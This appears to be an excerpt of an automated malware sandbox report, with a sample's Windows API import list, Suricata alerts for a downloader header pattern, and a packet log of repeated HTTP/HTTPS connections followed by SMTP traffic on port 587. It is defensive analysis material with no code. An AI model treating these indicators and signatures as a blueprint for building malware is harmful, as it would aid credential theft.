GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll	SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-20T10:12:03.712534+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49730	132.226.247.73	80	TCP
2024-11-20T10:12:05.931334+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49730	132.226.247.73	80	TCP
2024-11-20T10:12:06.614498+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49732	188.114.97.3	443	TCP
2024-11-20T10:12:08.322055+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49733	132.226.247.73	80	TCP
2024-11-20T10:12:08.890349+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49734	188.114.97.3	443	TCP
2024-11-20T10:12:13.120641+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49738	188.114.97.3	443	TCP
2024-11-20T10:12:14.805825+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49740	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2024 10:12:00.880903006 CET	49730	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:00.889509916 CET	80	49730	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:00.889584064 CET	49730	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:00.889869928 CET	49730	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:00.896346092 CET	80	49730	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:01.583122015 CET	80	49730	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:01.589139938 CET	49730	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:01.596306086 CET	80	49730	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:03.657114983 CET	80	49730	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:03.712533951 CET	49730	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:03.716056108 CET	49731	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:03.716094971 CET	443	49731	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:03.716147900 CET	49731	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:03.727030993 CET	49731	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:03.727046967 CET	443	49731	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:04.189733028 CET	443	49731	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:04.189903975 CET	49731	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:04.215805054 CET	49731	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:04.215825081 CET	443	49731	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:04.216131926 CET	443	49731	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:04.259460926 CET	49731	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:04.289593935 CET	49731	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:04.331338882 CET	443	49731	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:04.406116009 CET	443	49731	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:04.406253099 CET	443	49731	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:04.406378984 CET	49731	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:04.413912058 CET	49731	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:04.418096066 CET	49730	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:04.423232079 CET	80	49730	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:05.880707026 CET	80	49730	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:05.931334019 CET	49730	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:06.018886089 CET	49732	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:06.018951893 CET	443	49732	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:06.019016027 CET	49732	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:06.020235062 CET	49732	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:06.020263910 CET	443	49732	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:06.481980085 CET	443	49732	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:06.484579086 CET	49732	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:06.484622002 CET	443	49732	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:06.614526033 CET	443	49732	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:06.614602089 CET	443	49732	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:06.614675045 CET	49732	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:06.615447998 CET	49732	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:06.619703054 CET	49730	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:06.621136904 CET	49733	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:06.627404928 CET	80	49730	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:06.627521992 CET	49730	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:06.628578901 CET	80	49733	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:06.628695011 CET	49733	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:06.628815889 CET	49733	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:06.636332989 CET	80	49733	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:08.267118931 CET	80	49733	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:08.268635988 CET	49734	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:08.268687010 CET	443	49734	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:08.268774986 CET	49734	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:08.269057989 CET	49734	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:08.269072056 CET	443	49734	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:08.322055101 CET	49733	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:08.743057013 CET	443	49734	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:08.762020111 CET	49734	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:08.762047052 CET	443	49734	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:08.890445948 CET	443	49734	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:08.890609026 CET	443	49734	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:08.890666008 CET	49734	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:08.891074896 CET	49734	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:08.896754980 CET	49735	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:08.901876926 CET	80	49735	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:08.901954889 CET	49735	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:08.902065039 CET	49735	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:08.907150984 CET	80	49735	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:10.578113079 CET	80	49735	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:10.579587936 CET	49736	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:10.579626083 CET	443	49736	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:10.579689026 CET	49736	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:10.579952955 CET	49736	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:10.579962015 CET	443	49736	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:10.618763924 CET	49735	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:11.062151909 CET	443	49736	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:11.064290047 CET	49736	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:11.064320087 CET	443	49736	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:11.200912952 CET	443	49736	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:11.200998068 CET	443	49736	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:11.201047897 CET	49736	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:11.201541901 CET	49736	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:11.205884933 CET	49735	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:11.207045078 CET	49737	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:11.211852074 CET	80	49735	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:11.211904049 CET	49735	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:11.211949110 CET	80	49737	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:11.212023020 CET	49737	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:11.212124109 CET	49737	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:11.217209101 CET	80	49737	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:12.497940063 CET	80	49737	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:12.499419928 CET	49738	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:12.499459982 CET	443	49738	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:12.499553919 CET	49738	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:12.499819994 CET	49738	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:12.499840975 CET	443	49738	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:12.540740967 CET	49737	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:12.985251904 CET	443	49738	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:12.987371922 CET	49738	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:12.987402916 CET	443	49738	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:13.120726109 CET	443	49738	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:13.120927095 CET	443	49738	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:13.121012926 CET	49738	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:13.121448994 CET	49738	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:13.125742912 CET	49737	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:13.126737118 CET	49739	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:13.133598089 CET	80	49737	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:13.133707047 CET	49737	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:13.134238005 CET	80	49739	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:13.134315968 CET	49739	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:13.134474039 CET	49739	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:13.143552065 CET	80	49739	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:14.215956926 CET	80	49739	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:14.217634916 CET	49740	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:14.217679977 CET	443	49740	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:14.217741013 CET	49740	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:14.218031883 CET	49740	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:14.218045950 CET	443	49740	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:14.259435892 CET	49739	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:14.679297924 CET	443	49740	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:14.681524038 CET	49740	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:14.681561947 CET	443	49740	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:14.805906057 CET	443	49740	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:14.806082010 CET	443	49740	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:14.806376934 CET	49740	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:14.810199022 CET	49740	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:14.811074972 CET	49739	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:14.812153101 CET	49741	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:14.819606066 CET	80	49739	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:14.819833994 CET	49739	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:14.820264101 CET	80	49741	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:14.820440054 CET	49741	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:14.820614100 CET	49741	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:14.826107979 CET	80	49741	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:15.506475925 CET	80	49741	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:15.508399010 CET	49743	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:15.508447886 CET	443	49743	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:15.508728027 CET	49743	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:15.508943081 CET	49743	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:15.508960962 CET	443	49743	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:15.556472063 CET	49741	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:15.972615957 CET	443	49743	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:15.974735975 CET	49743	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:15.974783897 CET	443	49743	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:16.130686998 CET	443	49743	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:16.130862951 CET	443	49743	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:16.130918026 CET	49743	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:16.131505013 CET	49743	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:16.135978937 CET	49741	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:16.137243032 CET	49745	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:16.142168045 CET	80	49741	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:16.142229080 CET	49741	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:16.143147945 CET	80	49745	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:16.143225908 CET	49745	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:16.143327951 CET	49745	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:16.149187088 CET	80	49745	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:16.840287924 CET	80	49745	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:16.841681004 CET	49747	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:16.841739893 CET	443	49747	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:16.841927052 CET	49747	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:16.842246056 CET	49747	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:16.842264891 CET	443	49747	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:16.884407043 CET	49745	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:17.310127974 CET	443	49747	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:17.353286982 CET	49747	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:17.368521929 CET	49747	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:17.368532896 CET	443	49747	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:17.474575043 CET	443	49747	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:17.474730968 CET	443	49747	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:17.474801064 CET	49747	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:17.499355078 CET	49747	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:17.646873951 CET	49745	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:17.652287006 CET	80	49745	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:17.653709888 CET	49745	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:17.733469009 CET	49749	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:17.741996050 CET	80	49749	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:17.742062092 CET	49749	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:17.742362976 CET	49749	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:17.750792027 CET	80	49749	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:18.419549942 CET	80	49749	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:18.421103954 CET	49751	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:18.421143055 CET	443	49751	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:18.421211958 CET	49751	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:18.421529055 CET	49751	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:18.421542883 CET	443	49751	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:18.462533951 CET	49749	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:18.897814989 CET	443	49751	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:18.913827896 CET	49751	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:18.913871050 CET	443	49751	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:19.048476934 CET	443	49751	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:19.048650026 CET	443	49751	188.114.97.3	192.168.2.4
Nov 20, 2024 10:12:19.048842907 CET	49751	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:19.049732924 CET	49751	443	192.168.2.4	188.114.97.3
Nov 20, 2024 10:12:19.113631010 CET	49749	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:19.119167089 CET	80	49749	132.226.247.73	192.168.2.4
Nov 20, 2024 10:12:19.121561050 CET	49749	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:19.122332096 CET	49752	443	192.168.2.4	149.154.167.220
Nov 20, 2024 10:12:19.122383118 CET	443	49752	149.154.167.220	192.168.2.4
Nov 20, 2024 10:12:19.122447968 CET	49752	443	192.168.2.4	149.154.167.220
Nov 20, 2024 10:12:19.123056889 CET	49752	443	192.168.2.4	149.154.167.220
Nov 20, 2024 10:12:19.123070955 CET	443	49752	149.154.167.220	192.168.2.4
Nov 20, 2024 10:12:19.761032104 CET	443	49752	149.154.167.220	192.168.2.4
Nov 20, 2024 10:12:19.761172056 CET	49752	443	192.168.2.4	149.154.167.220
Nov 20, 2024 10:12:19.776026964 CET	49752	443	192.168.2.4	149.154.167.220
Nov 20, 2024 10:12:19.776047945 CET	443	49752	149.154.167.220	192.168.2.4
Nov 20, 2024 10:12:19.776587963 CET	443	49752	149.154.167.220	192.168.2.4
Nov 20, 2024 10:12:19.778925896 CET	49752	443	192.168.2.4	149.154.167.220
Nov 20, 2024 10:12:19.819336891 CET	443	49752	149.154.167.220	192.168.2.4
Nov 20, 2024 10:12:20.017066002 CET	443	49752	149.154.167.220	192.168.2.4
Nov 20, 2024 10:12:20.017146111 CET	443	49752	149.154.167.220	192.168.2.4
Nov 20, 2024 10:12:20.017196894 CET	49752	443	192.168.2.4	149.154.167.220
Nov 20, 2024 10:12:20.045120001 CET	49752	443	192.168.2.4	149.154.167.220
Nov 20, 2024 10:12:25.427419901 CET	49733	80	192.168.2.4	132.226.247.73
Nov 20, 2024 10:12:25.615206003 CET	49754	587	192.168.2.4	188.128.134.93
Nov 20, 2024 10:12:25.620239019 CET	587	49754	188.128.134.93	192.168.2.4
Nov 20, 2024 10:12:25.620358944 CET	49754	587	192.168.2.4	188.128.134.93
Nov 20, 2024 10:12:26.622209072 CET	587	49754	188.128.134.93	192.168.2.4
Nov 20, 2024 10:12:26.622452974 CET	49754	587	192.168.2.4	188.128.134.93
Nov 20, 2024 10:12:26.627449989 CET	587	49754	188.128.134.93	192.168.2.4
Nov 20, 2024 10:12:26.831485033 CET	587	49754	188.128.134.93	192.168.2.4
Nov 20, 2024 10:12:26.832825899 CET	49754	587	192.168.2.4	188.128.134.93
Nov 20, 2024 10:12:26.840697050 CET	587	49754	188.128.134.93	192.168.2.4
Nov 20, 2024 10:12:27.043236017 CET	587	49754	188.128.134.93	192.168.2.4
Nov 20, 2024 10:12:27.043644905 CET	49754	587	192.168.2.4	188.128.134.93
Nov 20, 2024 10:12:27.051909924 CET	587	49754	188.128.134.93	192.168.2.4
Nov 20, 2024 10:12:27.257616043 CET	587	49754	188.128.134.93	192.168.2.4
Nov 20, 2024 10:12:27.258130074 CET	49754	587	192.168.2.4	188.128.134.93
Nov 20, 2024 10:12:27.263129950 CET	587	49754	188.128.134.93	192.168.2.4
Nov 20, 2024 10:12:27.470093966 CET	587	49754	188.128.134.93	192.168.2.4
Nov 20, 2024 10:12:27.470418930 CET	49754	587	192.168.2.4	188.128.134.93
Nov 20, 2024 10:12:27.475280046 CET	587	49754	188.128.134.93	192.168.2.4
Nov 20, 2024 10:12:27.683676958 CET	587	49754	188.128.134.93	192.168.2.4
Nov 20, 2024 10:12:27.683871031 CET	49754	587	192.168.2.4	188.128.134.93
Nov 20, 2024 10:12:27.688906908 CET	587	49754	188.128.134.93	192.168.2.4
Nov 20, 2024 10:12:27.894241095 CET	587	49754	188.128.134.93	192.168.2.4
Nov 20, 2024 10:12:27.895019054 CET	49754	587	192.168.2.4	188.128.134.93
Nov 20, 2024 10:12:27.895073891 CET	49754	587	192.168.2.4	188.128.134.93
Nov 20, 2024 10:12:27.895100117 CET	49754	587	192.168.2.4	188.128.134.93
Nov 20, 2024 10:12:27.895116091 CET	49754	587	192.168.2.4	188.128.134.93
Nov 20, 2024 10:12:27.900998116 CET	587	49754	188.128.134.93	192.168.2.4
Nov 20, 2024 10:12:27.901027918 CET	587	49754	188.128.134.93	192.168.2.4
Nov 20, 2024 10:12:27.901036978 CET	587	49754	188.128.134.93	192.168.2.4
Nov 20, 2024 10:12:27.901041031 CET	587	49754	188.128.134.93	192.168.2.4
Nov 20, 2024 10:12:28.347641945 CET	587	49754	188.128.134.93	192.168.2.4
Nov 20, 2024 10:12:28.400063992 CET	49754	587	192.168.2.4	188.128.134.93
Nov 20, 2024 10:14:05.619169950 CET	49754	587	192.168.2.4	188.128.134.93
Nov 20, 2024 10:14:05.627856970 CET	587	49754	188.128.134.93	192.168.2.4
Nov 20, 2024 10:14:05.826808929 CET	587	49754	188.128.134.93	192.168.2.4
Nov 20, 2024 10:14:05.826827049 CET	587	49754	188.128.134.93	192.168.2.4
Nov 20, 2024 10:14:05.826956034 CET	49754	587	192.168.2.4	188.128.134.93
Nov 20, 2024 10:14:05.826956034 CET	49754	587	192.168.2.4	188.128.134.93
